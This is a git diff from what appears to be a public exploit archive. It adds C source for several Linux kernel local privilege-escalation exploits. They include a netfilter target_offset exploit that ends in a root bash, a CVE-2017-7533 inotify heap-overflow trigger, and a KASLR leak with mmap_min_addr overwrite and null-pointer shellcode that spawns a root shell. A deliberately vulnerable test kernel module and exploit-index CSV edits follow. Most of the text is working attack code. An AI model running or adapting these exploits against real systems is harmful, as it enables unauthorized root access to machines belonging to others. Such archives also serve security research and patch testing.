close(sock); + free(data); + printf("[+] Done! Now run ./pwn\n"); + + return 0; +} + +int main(void) { + void *stack; + int ret; + + printf("netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\n"); + if (check_mod()) { + printf("[-] No ip_tables module found! Quitting...\n"); + return -1; + } + + if (check_smaep()) { + printf("[-] SMEP/SMAP support dectected! Quitting...\n"); + return -1; + } + + ret = unshare(CLONE_NEWUSER); + + if (ret == -1) { + perror("unshare"); + return -1; + } + + stack = (void *) malloc(65536); + + if (stack == NULL) { + perror("malloc"); + return -1; + } + + clone(decr, stack + 65536, CLONE_NEWNET, NULL); + + sleep(1); + + return 0; +} + +/** decr.c EOF **/ + +/** pwn.c **/ +/** + * Run ./decr first! + * + * 23/04/2016 + * - vnik + */ +#include +#include +#include +#include +#include +#include +#include +#include + +#define MMAP_ADDR 0xff814e3000 +#define MMAP_OFFSET 0xb0 + +typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred); +typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred); + +void __attribute__((regparm(3))) privesc() { + commit_creds_fn commit_creds = (void *)0xffffffff810a21c0; + prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0; + commit_creds(prepare_kernel_cred((uint64_t)NULL)); +} + +int main() { + void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0); + assert(payload == (void *)MMAP_ADDR); + + void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET); + + memset(shellcode, 0, 0x300000); + + void *ret = memcpy(shellcode, &privesc, 0x300); + assert(ret == shellcode); + + printf("[+] Escalating privs...\n"); + + int fd = open("/dev/ptmx", O_RDWR); + close(fd); + + assert(!getuid()); + + printf("[+] We've got root!"); + + return execl("/bin/bash", "-sh", NULL); +} +/** pwn.c EOF **/ \ No newline at end of file diff --git a/exploits/linux/local/44302.c b/exploits/linux/local/44302.c new file mode 100644 index 000000000..9ba7c76d1 --- /dev/null +++ b/exploits/linux/local/44302.c @@ -0,0 +1,349 @@ +/* + * + * + * CVE-2017-7533 inotfiy linux kernel vulnerability. + * + * $ gcc -o exploit exploit.c -lpthread + * $./exploit + * + * ``` + * Listening for events. + * Listening for events. + * alloc_len : 50 + * longname="test_dir/bbbb32103210321032100��1����" + * handle_events() event->name : b, event->len : 16 + * Detected overwrite!!! + * callrename done. + * alloc_len : 50 + * ``` + * This is a heap overflow bug, + * tested on the Debian 8 Linux version 3.16.39(amd64) successfully. + * + * You could modifiy one byte to manipulate rip register, but I do not tried hard to get root. + * + * Thanks to the Vladis Dronov and someone from HK university. + * ``` + * ``` + * Jeremy Huang (jeremyhcw@gmail.com) +*/ + +//Trigger inotify event by file open and rename to trigger the vulnerability and exploit + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +void *callrename( void *ptr ); +void *openclose( void *ptr ); +pthread_t thread1, thread2; +int lastfd; +char *space; +int original,printed, *int_space; + +volatile int stop = 0; + +// Try kmalloc-192 made by cyclic(100) +char *orig_name = "f"; + +// 120 +//char *orig_name = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; + +static void handle_events(int fd, int *wd, int argc, char* argv[]) +{ + /* Some systems cannot read integer variables if they are not + properly aligned. On other systems, incorrect alignment may + decrease performance. Hence, the buffer used for reading from + the inotify file descriptor should have the same alignment as + struct inotify_event. */ + + char buf[4096] + __attribute__ ((aligned(__alignof__(struct inotify_event)))); + const struct inotify_event *event; + int i; + ssize_t len; + char *ptr; + + /* Loop while events can be read from inotify file descriptor. */ + + for (;;) { + + /* Read some events. */ + + len = read(fd, buf, sizeof buf); + if (len == -1 && errno != EAGAIN) { + perror("read"); + exit(EXIT_FAILURE); + } + + /* If the nonblocking read() found no events to read, then + it returns -1 with errno set to EAGAIN. In that case, + we exit the loop. */ + + if (len <= 0) + break; + + /* Loop over all events in the buffer */ + + for (ptr = buf; ptr < buf + len; + ptr += sizeof(struct inotify_event) + event->len) { + + event = (const struct inotify_event *) ptr; + + /* Print event type */ +/* + if (event->mask & IN_OPEN) + printf("IN_OPEN: "); + if (event->mask & IN_CLOSE_NOWRITE) + printf("IN_CLOSE_NOWRITE: "); + if (event->mask & IN_CLOSE_WRITE) + printf("IN_CLOSE_WRITE: "); + if (event->mask % IN_ACCESS) + printf("IN_ACCESS: "); +*/ + /* Print the name of the watched directory */ + + for (i = 1; i < argc; ++i) { + if (wd[i] == event->wd) { + //printf("%s/", argv[i]); + break; + } + } + + /* Print the name of the file */ + + if (event->len && strcmp(event->name, orig_name)) { + printf("%s() event->name : %s, event->len : %d\n",__func__, event->name, event->len); + + if ( !strcmp(event->name, "b") && strlen(event->name) == 1) { + printf("Detected overwrite!!!\n"); + stop = 1; + break; + } + } + + /* Print type of filesystem object */ +/* + if (event->mask & IN_ISDIR) + printf(" [directory]\n"); + else + printf(" [file]\n"); +*/ + } + } +} + +static void* notify_thread_func(void* arg) +{ + char buf; + int fd, i, poll_num; + int *wd; + nfds_t nfds; + struct pollfd fds[2]; + + int argc = 2; + char *argv[] = { NULL, "test_dir", NULL}; +/* + if (argc < 2) { + printf("Usage: %s PATH [PATH ...]\n", argv[0]); + exit(EXIT_FAILURE); + } +*/ + //printf("Press ENTER key to terminate.\n"); + + /* Create the file descriptor for accessing the inotify API */ + + fd = inotify_init1(IN_NONBLOCK); + if (fd == -1) { + perror("inotify_init1"); + exit(EXIT_FAILURE); + } + + /* Allocate memory for watch descriptors */ + + wd = calloc(argc, sizeof(int)); + if (wd == NULL) { + perror("calloc"); + exit(EXIT_FAILURE); + } + + /* Mark directories for events + - file was opened + - file was closed */ + + for (i = 1; i < argc; i++) { + wd[i] = inotify_add_watch(fd, argv[i], + IN_OPEN | IN_CLOSE| IN_ACCESS); + if (wd[i] == -1) { + fprintf(stderr, "Cannot watch '%s'\n", argv[i]); + perror("inotify_add_watch"); + exit(EXIT_FAILURE); + } + } + + /* Prepare for polling */ + + nfds = 2; + + /* Console input */ + + fds[0].fd = STDIN_FILENO; + fds[0].events = POLLIN; + + /* Inotify input */ + + fds[1].fd = fd; + fds[1].events = POLLIN; + + printf("Listening for events.\n"); + while (!stop) { + poll_num = poll(fds, nfds, -1); + if (poll_num == -1) { + if (errno == EINTR) + continue; + perror("poll"); + exit(EXIT_FAILURE); + } + + if (poll_num > 0) { + + if (fds[1].revents & POLLIN) { + + handle_events(fd, wd, argc, argv); + } + } + } + + close(fd); + + free(wd); + exit(EXIT_SUCCESS); +} + +void *trigger_rename_open(void* arg) +{ + int iret1, iret2,i; + + setvbuf(stdout,0,2,0); + + iret1 = pthread_create( &thread1, NULL, callrename, NULL); + if(iret1) + { + fprintf(stderr,"Error - pthread_create() return code: %d\n",iret1); + exit(EXIT_FAILURE); + } + + iret2 = pthread_create( &thread2, NULL, openclose, NULL); + if(iret2) + { + fprintf(stderr,"Error - pthread_create() return code: %d\n",iret2); + exit(EXIT_FAILURE); + } + pthread_join( thread1, NULL); + pthread_join( thread2, NULL); + exit(EXIT_SUCCESS); +} + + +// 250 +char *longname_padding = "bbbb3210321032103210"; +//char *longname_padding = "bbbb32103210321032103210ABCDEF"; +/* +rcx : 44434241.. + DCDA0123 +*/ +// char *longname_padding = "bbbb3210321032GFEDCBA"; +// 31 will crash +void *callrename( void *ptr ) +{ + int i,m,k; + char enter = 0; + char origname[1024]; + char longname[1024]; + char next_ptr[8] = "\x30\xff\xff\x31\xff\xff\xff\xff"; + char prev_ptr[8] = ""; + // This value will overwrite the next (struct fsnotify_event)event->list.next + + + // create shortname being initial name. + snprintf(origname, sizeof origname, "test_dir/%s", orig_name); + printf("alloc_len : %d\n", 48 + strlen(orig_name)+1); + //printf("origname=\"%s\"\n", origname); + + snprintf(longname, sizeof longname, "test_dir/%s%s%s", + longname_padding, next_ptr, prev_ptr); + //strcat(longname,space); + printf("longname=\"%s\"\n", longname); + + for (i=0;i<10000 && !stop ;i++) + { + if (rename(origname,longname)<0) perror("rename1"); + if (rename(longname,origname)<0) perror("rename2"); + + } + + printf("callrename done.\n"); +} + +void *openclose( void *ptr ) +{ + int j,fd,m,k; + char origname[1024]; + snprintf(origname, sizeof origname, "test_dir/%s", orig_name); + + for (j=0;j<8000 && !stop;j++ ) + { + open(origname,O_RDWR); + + } + printf("alloc_len : %d\n", 48 + strlen(orig_name)+1); + +} + + +void main(void) +{ + pthread_t notify_thread[4]; + pthread_t rename_thread; + int i = 0; + + char buf[1024]; + snprintf(buf, sizeof buf, "touch test_dir/%s", orig_name); + system("rm -rf /data/local/tmp/test_dir ; mkdir test_dir"); + system(buf); + + for ( i ; i < 2; i++ ) { + pthread_create(¬ify_thread[i], + NULL, + notify_thread_func, + NULL); + } + //Trigger inotify event by file open and rename to + //trigger the vulnerability + pthread_create(&rename_thread, NULL, trigger_rename_open, NULL); + + pthread_join(rename_thread, NULL); + for ( i = 0; i < 2; i++ ) + pthread_join(notify_thread[i], NULL); + +} \ No newline at end of file diff --git a/exploits/linux/local/44303.c b/exploits/linux/local/44303.c new file mode 100644 index 000000000..0b3b52640 --- /dev/null +++ b/exploits/linux/local/44303.c @@ -0,0 +1,307 @@ +/** disable_map_min_add.c **/ +/* + * + */ + +#include +#include +#include +#include +#include +#include +#include + +/* offsets might differ, kernel was custom compiled + * you can read vmlinux and caculate the offset when testing + */ + +/* +#define OFFSET_KERNEL_BASE 0x000000 + */ +#define MMAP_MIN_ADDR 0x1101de8 +#define DAC_MMAP_MIN_ADDR 0xe8e810 + +/* get kernel functions address by reading /proc/kallsyms */ +unsigned long get_kernel_sym(char *name) +{ + FILE *f; + unsigned long addr; + char dummy; + char sname[256]; + int ret = 0; + + f = fopen("/proc/kallsyms", "r"); + if (f == NULL) { + printf("[-] Failed to open /proc/kallsyms\n"); + exit(-1); + } + printf("[+] Find %s...\n", name); + while(ret != EOF) { + ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); + if (ret == 0) { + fscanf(f, "%s\n", sname); + continue; + } + if (!strcmp(name, sname)) { + fclose(f); + printf("[+] Found %s at %lx\n", name, addr); + return addr; + } + } + fclose(f); + return 0; +} + +int main(void) +{ + int pid, pid2, pid3; + struct rusage rusage = { }; + unsigned long *p, *kernel_base; + char *mmap_min_addr, *dac_mmap_min_addr; + pid = fork(); + if (pid > 0) { + /* try to bypass kaslr when /proc/kallsyms isn't readable */ + syscall(__NR_waitid, P_PID, pid, NULL, WEXITED|WNOHANG|__WNOTHREAD, &rusage); + printf("[+] Leak size=%d bytes\n", sizeof(rusage)); + for (p = (unsigned long *)&rusage; + p < (unsigned long *)((char *)&rusage + sizeof(rusage)); + p++) { + printf("[+] Leak point: %p\n", p); + if (*p > 0xffffffff00000000 && *p < 0xffffffffff000000) { + p = (unsigned long *)(*p&0xffffffffff000000 /*+ OFFSET_TO_BASE*/); // spender's wouldn't actually work when KASLR was enabled + break; + } + } + if(p < (unsigned long *)0xffffffff00000000 || p > (unsigned long *)0xffffffffff000000) + exit(-1); + } else if (pid == 0) { + sleep(1); + exit(0); + } + + kernel_base = get_kernel_sym("startup_64"); + printf("[+] Got kernel base: %p\n", kernel_base); + mmap_min_addr = (char *)kernel_base + MMAP_MIN_ADDR; + printf("[+] Got mmap_min_addr: %p\n", mmap_min_addr); + dac_mmap_min_addr = (char *)kernel_base + DAC_MMAP_MIN_ADDR; + printf("[+] Got dac_mmap_min_addr: %p\n", dac_mmap_min_addr); + + pid2 = fork(); + if (pid2 > 0) { + printf("[+] Overwriting map_min_addr...\n"); + if (syscall(__NR_waitid, P_PID, pid, (siginfo_t *)(mmap_min_addr - 2), WEXITED|WNOHANG|__WNOTHREAD, NULL) < 0) { + printf("[-] Failed!\n"); + exit(1); + } + } else if (pid2 == 0) { + sleep(1); + exit(0); + } + + pid3 = fork(); + if (pid3 > 0) { + printf("[+] Overwriting dac_mmap_min_addr...\n"); + if (syscall(__NR_waitid, P_PID, pid, (siginfo_t *)(dac_mmap_min_addr - 2), WEXITED|WNOHANG|__WNOTHREAD, NULL) < 0) { + printf("[-] Failed!\n"); + exit(1); + } + printf("[+] map_min_addr disabled!\n"); + exit(0); + } else if (pid3 == 0) { + sleep(1); + exit(0); + } + return 0; +} +/** disable_map_min_add.c EOF **/ + +/** null_poiter_exploit.c **/ + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +struct cred; +struct task_struct; + +typedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3))); +typedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3))); + +prepare_kernel_cred_t prepare_kernel_cred; +commit_creds_t commit_creds; + +/* a kernel null pointer derefence will help get privilege + * /proc/test is a kernel-load module create for testing + * touch_null_kp can be replace your own implement to + * touch a kernel null ponit + */ +void touch_null_kp() { + printf("[+]Start touch kernel null point\n"); + + int *f = open("/proc/test", O_RDONLY); + read(f, NULL, 0); +} + +/* run shell after root */ +void get_shell() { + char *argv[] = {"/bin/sh", NULL}; + + if (getuid() == 0){ + printf("[+] Root shell success !! :)\n"); + execve("/bin/sh", argv, NULL); + } + printf("[-] failed to get root shell :(\n"); +} + +/* use for privilige escalation */ +void get_root() { + commit_creds(prepare_kernel_cred(0)); +} + +/* get function address by reading /proc/kallsyms */ +unsigned long get_kernel_sym(char *name) +{ + FILE *f; + unsigned long addr; + char dummy; + char sname[256]; + int ret = 0; + + f = fopen("/proc/kallsyms", "r"); + if (f == NULL) { + printf("[-] Failed to open /proc/kallsyms\n"); + exit(-1); + } + printf("[+] Find %s...\n", name); + while(ret != EOF) { + ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); + if (ret == 0) { + fscanf(f, "%s\n", sname); + continue; + } + if (!strcmp(name, sname)) { + fclose(f); + printf("[+] Found %s at %lx\n", name, addr); + return addr; + } + } + fclose(f); + return 0; +} + +int main(int ac, char **av) +{ + + /* get function address */ + prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred"); + commit_creds = (commit_creds_t)get_kernel_sym("commit_creds"); + printf("Got commit_creds:%p,prepare_kernel_cred%p\n", commit_creds, prepare_kernel_cred); + + /* allocate memory loacate in 0x00 */ + printf("[+] Try to allocat 0x00000000...\n"); + if (mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANON|MAP_PRIVATE|MAP_FIXED, -1, 0) == (char *)-1){ + printf("[-] Failed to allocat 0x00000000\n"); + return -1; + } + printf("[+] Allocation success !\n"); + /* memset(0, 0xcc, 4096); */ + /* + //movq rax, 0xffffffff81f3f45a + //movq [rax], 0 + // it is not nessecc + mov rax, 0x4242424242424242 + call rax + xor rax, rax + ret + replace 0x4242424242424242 by get_root + https://defuse.ca/online-x86-assembler.htm#disassembly + */ + + unsigned char shellcode[] = + { /*0x48, 0xC7, 0xC0, 0x5A, 0xF4, 0xF3, 0x81, *//*0x48, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00,*/ 0x48, 0xB8, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0xFF, 0xD0, 0x48, 0x31, 0xC0, 0xC3 }; + /* insert the getroot address to shellcode */ + void **get_root_offset = rawmemchr(shellcode, 0x42); + (*get_root_offset) = get_root; + /* map shellcode to 0x00 */ + memcpy(0, shellcode, sizeof(shellcode)); + + /* jmp to 0x00 */ + touch_null_kp(); + + get_shell(); + +} + +/** null_poiter_exploit.c EOF **/ + +/** test.c **/ +#include +#include +#include +#include +#include +#include +#include + +#define MY_DEV_NAME "test" +#define DEBUG_FLAG "PROC_DEV" + +extern unsigned long proc_test_sp_print; +static ssize_t proc_read (struct file *proc_file, char __user *proc_user, size_t n, loff_t *loff); +static ssize_t proc_write (struct file *proc_file, const char __user *proc_user, size_t n, loff_t *loff); +static int proc_open (struct inode *proc_inode, struct file *proc_file); +static struct file_operations a = { + .open = proc_open, + .read = proc_read, + .write = proc_write, +}; + + +static int __init mod_init(void) +{ + struct proc_dir_entry *test_entry; + const struct file_operations *proc_fops = &a; + printk(DEBUG_FLAG":proc init start\n"); + + test_entry = proc_create(MY_DEV_NAME, S_IRUGO|S_IWUGO, NULL, proc_fops); + if(!test_entry) + printk(DEBUG_FLAG":there is somethings wrong!\n"); + + printk(DEBUG_FLAG":proc init over!\n"); + return 0; +} + +static ssize_t proc_read (struct file *proc_file, char *proc_user, size_t n, loff_t *loff) +{ + void (*fun)(void); + fun = NULL; + //printk("%s:thread.sp0: %p, task->stack: %p\n", "PROC", current->thread.sp0, current->stack); + fun(); + //printk("The memory of %p : %d\n", proc_user, *proc_user); + return 0; +} + +static ssize_t proc_write (struct file *proc_file, const char __user *proc_user, size_t n, loff_t *loff) +{ + printk("%s:thread.sp0: %p, task->stack: %p\n", "PROC", current->thread.sp0, current->stack); + return 0; +} + +int proc_open (struct inode *proc_inode, struct file *proc_file) +{ + printk(DEBUG_FLAG":into open, cmdline:%s!\n", current->comm); + printk("%s:thread.sp0: %p, task->stack: %p\n", "PROC", current->thread.sp0, current->stack); + return 0; +} + +module_init(mod_init); +/** test.c EOF **/ \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 30dfae0be..f16dd9e20 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -1926,7 +1926,7 @@ id,file,description,date,author,type,platform,port 16952,exploits/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2)",2011-03-10,zx2c4,dos,linux, 16960,exploits/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow",2011-03-11,mr_me,dos,linux, 16966,exploits/linux/dos/16966.php,"PHP 5.3.6 - 'shmop_read()' Integer Overflow Denial of Service",2011-03-12,"Jose Carlos Norte",dos,linux, -16973,exploits/linux/dos/16973.c,"Linux 2.6.37-rc1 - serial_core TIOCGICOUNT Leak",2011-03-14,prdelka,dos,linux, +16973,exploits/linux/dos/16973.c,"Linux Kenel 2.6.37-rc1 - serial_core TIOCGICOUNT Leak",2011-03-14,prdelka,dos,linux, 16979,exploits/windows/dos/16979.html,"Opera 11.01 - NULL PTR Dereference",2011-03-15,echo,dos,windows, 16986,exploits/windows/dos/16986.py,"AVIPreview 0.26 Alpha - Denial of Service",2011-03-16,BraniX,dos,windows, 16996,exploits/windows/dos/16996.rb,"Fake Webcam 6.1 - Local Crash (PoC)",2011-03-17,"Anastasios Monachos",dos,windows, @@ -2123,7 +2123,7 @@ id,file,description,date,author,type,platform,port 18339,exploits/windows/dos/18339.py,"GPSMapEdit 1.1.73.2 - '.lst' Local Denial of Service",2012-01-09,"Julien Ahrens",dos,windows, 18351,exploits/netware/dos/18351.txt,"Novell Netware - XNFS caller_name xdrDecodeString Remote Code Execution",2012-01-10,"Francis Provencher",dos,netware, 18370,exploits/multiple/dos/18370.txt,"PHP 5.3.8 - Multiple Vulnerabilities",2012-01-14,"Maksymilian Arciemowicz",dos,multiple, -18378,exploits/linux/dos/18378.c,"Linux 2.6.36 IGMP - Remote Denial of Service",2012-01-17,kingcope,dos,linux, +18378,exploits/linux/dos/18378.c,"Linux Kernel 2.6.36 IGMP - Remote Denial of Service",2012-01-17,kingcope,dos,linux, 18976,exploits/php/dos/18976.php,"PHP 5.3.10 - 'spl_autoload()' Local Denial of Service",2012-06-03,"Yakir Wizman",dos,php, 18399,exploits/windows/dos/18399.py,"VideoLAN VLC Media Player 1.2.0 - 'libtaglib_pluggin.dll' Denial of Service",2012-01-20,"Mitchell Adair",dos,windows, 18698,exploits/windows/dos/18698.py,"Xion Audio Player 1.0.127 - '.aiff' Denial of Service",2012-04-04,condis,dos,windows, @@ -2581,7 +2581,7 @@ id,file,description,date,author,type,platform,port 21074,exploits/unix/dos/21074.pl,"glFTPd 1.x - 'LIST' Denial of Service",2001-08-17,"ASGUARD LABS",dos,unix, 21077,exploits/bsd/dos/21077.c,"BSDI 3.0/3.1 - Local Kernel Denial of Service",2001-08-21,V9,dos,bsd, 21092,exploits/hardware/dos/21092.txt,"Cisco CBOS 2.x - Multiple TCP Connection Denial of Service Vulnerabilities",2001-08-23,"Cisco Security",dos,hardware, -40419,exploits/linux/dos/40419.c,"Linux - SELinux W+X Protection Bypass via AIO",2016-09-23,"Google Security Research",dos,linux, +40419,exploits/linux/dos/40419.c,"Linux SELinux - W+X Protection Bypass via AIO",2016-09-23,"Google Security Research",dos,linux, 21099,exploits/windows/dos/21099.c,"Microsoft Windows Server 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,dos,windows, 21103,exploits/hardware/dos/21103.c,"D-Link Dl-704 2.56 b5 - IP Fragment Denial of Service",2000-05-23,phonix,dos,hardware, 21122,exploits/linux/dos/21122.sh,"Linux Kernel 2.2/2.4 - Deep Symbolic Link Denial of Service",2001-10-18,Nergal,dos,linux, @@ -4152,7 +4152,7 @@ id,file,description,date,author,type,platform,port 32881,exploits/windows/dos/32881.py,"QtWeb Browser 2.0 - '.HTML' File Remote Denial of Service",2009-04-01,LiquidWorm,dos,windows, 32899,exploits/windows/dos/32899.py,"Jzip - Buffer Overflow (Denial of Service) (SEH Unicode)",2014-04-16,"motaz reda",dos,windows, 32902,exploits/windows/dos/32902.py,"Microsoft Internet Explorer 8 - File Download Denial of Service",2009-04-11,"Nam Nguyen",dos,windows, -32926,exploits/linux/dos/32926.c,"Linux group_info refcounter - Overflow Memory Corruption",2014-04-18,"Thomas Pollet",dos,linux, +32926,exploits/linux/dos/32926.c,"Linux Kernel - 'group_info' refcounter Overflow Memory Corruption",2014-04-18,"Thomas Pollet",dos,linux, 32939,exploits/windows/dos/32939.txt,"Trend Micro OfficeScan 8.0 Client - Denial of Service",2009-04-21,"Juan Pablo Lopez Yacubian",dos,windows, 32949,exploits/multiple/dos/32949.txt,"Mani's Admin Plugin - Remote Denial of Service",2009-04-22,M4rt1n,dos,multiple, 32951,exploits/novell/dos/32951.py,"Recover Data for Novell Netware 1.0 - '.sav' Remote Denial of Service",2009-04-23,"AbdulAziz Hariri",dos,novell, @@ -5040,7 +5040,7 @@ id,file,description,date,author,type,platform,port 39502,exploits/linux/dos/39502.py,"GpicView 0.2.5 - Crash (PoC)",2016-02-26,"David Silveiro",dos,linux, 39503,exploits/multiple/dos/39503.txt,"Wireshark - print_hex_data_buffer / print_packet Use-After-Free",2016-02-26,"Google Security Research",dos,multiple, 39504,exploits/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver - perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",dos,android, -39505,exploits/linux/dos/39505.c,"Linux io_submit L2TP sendmsg - Integer Overflow",2016-02-26,"Google Security Research",dos,linux, +39505,exploits/linux/dos/39505.c,"Linux Kernel - io_submit L2TP sendmsg Integer Overflow",2016-02-26,"Google Security Research",dos,linux, 39509,exploits/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - '.pm4' Integer Division By Zero",2016-03-01,LiquidWorm,dos,windows, 39512,exploits/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)",2016-03-01,"Shantanu Khandelwal",dos,windows, 39516,exploits/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",dos,windows,69 @@ -5103,7 +5103,7 @@ id,file,description,date,author,type,platform,port 39654,exploits/windows/dos/39654.pl,"Xion Audio Player 1.5 (build 160) - '.mp3' Crash (PoC)",2016-04-04,"Charley Celice",dos,windows, 39657,exploits/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,dos,multiple, 39663,exploits/windows/dos/39663.html,"Microsoft Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",dos,windows, -39669,exploits/linux_x86/dos/39669.txt,"Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco & Ismael Ripoll",dos,linux_x86, +39669,exploits/linux_x86/dos/39669.txt,"Linux Kernel (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco & Ismael Ripoll",dos,linux_x86, 39685,exploits/android/dos/39685.txt,"Google Android - IOMX 'getConfig'/'getParameter' Information Disclosure",2016-04-11,"Google Security Research",dos,android, 39686,exploits/android/dos/39686.txt,"Google Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",dos,android, 39699,exploits/windows/dos/39699.html,"Microsoft Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use-After-Free",2016-04-15,"Marcin Ressel",dos,windows, @@ -5203,7 +5203,7 @@ id,file,description,date,author,type,platform,port 40073,exploits/windows/dos/40073.py,"Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash (PoC)",2016-07-08,hyp3rlinx,dos,windows, 40074,exploits/windows/dos/40074.txt,"Microsoft WinDbg - 'logviewer.exe' Crash (PoC)",2016-07-08,hyp3rlinx,dos,windows, 40183,exploits/multiple/dos/40183.html,"WebKit - TypedArray.fill Memory Corruption",2016-07-29,"Google Security Research",dos,multiple, -40182,exploits/arm/dos/40182.txt,"Linux ARM/ARM64 - 'perf_event_open()' Arbitrary Memory Read",2016-07-29,"Google Security Research",dos,arm, +40182,exploits/arm/dos/40182.txt,"Linux Kernel (ARM/ARM64) - 'perf_event_open()' Arbitrary Memory Read",2016-07-29,"Google Security Research",dos,arm, 40310,exploits/multiple/dos/40310.txt,"Adobe Flash - BitmapData.copyPixels Use-After-Free",2016-08-29,"Google Security Research",dos,multiple, 40181,exploits/linux/dos/40181.c,"AppArmor securityfs < 4.8 - 'aa_fs_seq_hash_show' Reference Count Leak",2016-07-29,"Google Security Research",dos,linux, 40155,exploits/php/dos/40155.py,"PHP 5.5.37/5.6.23/7.0.8 - 'bzread()' Out-of-Bounds Write",2016-07-25,"Hans Jerry Illikainen",dos,php,80 @@ -5839,7 +5839,7 @@ id,file,description,date,author,type,platform,port 43175,exploits/multiple/dos/43175.html,"WebKit - 'WebCore::RenderObject::previousSibling' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple, 43176,exploits/multiple/dos/43176.html,"WebKit - 'WebCore::FormSubmission::create' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple, 43464,exploits/android/dos/43464.txt,"Android - Inter-Process munmap due to Race Condition in ashmem",2018-01-08,"Google Security Research",dos,android, -43178,exploits/linux/dos/43178.c,"Linux - 'mincore()' Uninitialized Kernel Heap Page Disclosure",2017-11-24,"Google Security Research",dos,linux, +43178,exploits/linux/dos/43178.c,"Linux Kernel - 'mincore()' Uninitialized Kernel Heap Page Disclosure",2017-11-24,"Google Security Research",dos,linux, 43180,exploits/windows/dos/43180.js,"Microsoft Edge Chakra JIT - 'BailOutOnTaggedValue' Bailouts Type Confusion",2017-11-27,"Google Security Research",dos,windows, 43181,exploits/windows/dos/43181.js,"Microsoft Edge Chakra JIT - 'Inline::InlineCallApplyTarget_Shared' does not Return the return Instruction",2017-11-27,"Google Security Research",dos,windows, 43182,exploits/windows/dos/43182.js,"Microsoft Edge Chakra JIT - Incorrect Function Declaration Scope",2017-11-27,"Google Security Research",dos,windows, @@ -5850,7 +5850,7 @@ id,file,description,date,author,type,platform,port 43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android, 43194,exploits/linux/dos/43194.txt,"QEMU - NBD Server Long Export Name Stack Buffer Overflow",2017-11-29,"Eric Blake",dos,linux, 43470,exploits/windows/dos/43470.cpp,"Microsoft Windows - 'nt!NtQueryInformationProcess (information class 76_ QueryProcessEnergyValues)' Kernel Stack Memory Disclosure",2018-01-09,"Google Security Research",dos,windows, -43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page",2017-11-30,Bindecy,dos,linux, +43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)",2017-11-30,Bindecy,dos,linux, 43469,exploits/windows/dos/43469.js,"Microsoft Edge Chakra JIT - Escape Analysis Bug",2018-01-09,"Google Security Research",dos,windows, 43207,exploits/windows/dos/43207.txt,"Abyss Web Server < 2.11.6 - Heap Memory Corruption",2017-12-01,hyp3rlinx,dos,windows, 43229,exploits/windows/dos/43229.cs,"Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path",2017-12-07,"Google Security Research",dos,windows, @@ -5901,6 +5901,9 @@ id,file,description,date,author,type,platform,port 44268,exploits/android/dos/44268.txt,"Broadcom BCM43xx Wi-Fi - 'BroadPWN' Denial of Service",2016-12-01,649,dos,android, 44271,exploits/windows/dos/44271.py,"WebLog Expert Enterprise 9.4 - Denial of Service",2018-03-09,hyp3rlinx,dos,windows, 44291,exploits/android/dos/44291.cpp,"Android DRM Services - Buffer Overflow",2018-03-15,"Tamir Zahavi-Brunner",dos,android, +44301,exploits/linux/dos/44301.c,"Linux Kernel < 4.5.1 - Off-By-One (PoC)",2016-10-16,"Vitaly Nikolenko",dos,linux, +44304,exploits/linux/dos/44304.c,"Linux Kernel - 'mincore()' Heap Page Disclosure (PoC)",2017-12-11,anonymous,dos,linux, +44305,exploits/linux/dos/44305.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)",2017-12-11,anonymous,dos,linux, 